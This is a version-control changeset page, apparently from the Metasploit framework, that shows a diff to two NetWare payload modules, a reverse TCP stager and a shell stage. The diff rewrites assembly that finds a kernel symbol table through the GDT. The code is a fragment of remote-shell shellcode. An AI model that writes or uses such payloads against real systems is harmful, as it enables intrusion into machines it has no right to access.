Changeset 5449
- Timestamp:
- 03/18/08 10:57:38 (5 months ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/payloads/stagers/netware/reverse_tcp.rb
r5371 r5449 88 88 89 89 main_code: 90 ; search DebuggerSymbolHashTable pointer 90 ; search DebuggerSymbolHashTable pointer using GDT system call gate 91 ; -> points inside SERVER.NLM 91 92 cli 92 mov ebp, 0x300000 ; SERVER.NLM code 93 93 sub esp, 8 94 mov ecx, esp 95 sgdt [ecx] 96 97 cli 98 mov ebx, [ecx+2] 99 100 mov bp, word ptr [ebx+0x4E] 101 shl ebp, 16 102 mov bp, word ptr [ebx+0x48] 103 94 104 f_finddebugger: 95 cmp dword ptr[ebp], 0 x8110eac1105 cmp dword ptr[ebp], 0 96 106 jnz f_next 97 cmp dword ptr[ebp+4], 0x 0001ffe2107 cmp dword ptr[ebp+4], 0x808bc201 98 108 jz f_end 99 109 f_next: 100 inc ebp110 dec ebp 101 111 jmp f_finddebugger 102 112 f_end: 103 mov ebp, [ebp +0xc]113 mov ebp, [ebp-7] 104 114 105 115 ; resolve function pointers framework3/trunk/modules/payloads/stages/netware/shell.rb
r5371 r5449 94 94 stosd 95 95 96 ; search DebuggerSymbolHashTable pointer 96 ; search DebuggerSymbolHashTable pointer using GDT system call gate 97 ; -> points inside SERVER.NLM 97 98 cli 98 mov ebp, 0x300000 ; SERVER.NLM code 99 sub esp, 8 100 mov ecx, esp 101 sgdt [ecx] 102 103 cli 104 mov ebx, [ecx+2] 105 mov bp, word ptr [ebx+0x4E] 106 shl ebp, 16 107 mov bp, word ptr [ebx+0x48] 99 108 100 109 f_finddebugger: 101 cmp dword ptr[ebp], 0 x8110eac1110 cmp dword ptr[ebp], 0 102 111 jnz f_next 103 cmp dword ptr[ebp+4], 0x 0001ffe2112 cmp dword ptr[ebp+4], 0x808bc201 104 113 jz f_end 105 114 f_next: 106 inc ebp115 dec ebp 107 116 jmp f_finddebugger 108 117 f_end: 109 mov ebp, [ebp +0xc]118 mov ebp, [ebp-7] 110 119 111 120 ; resolve function pointers
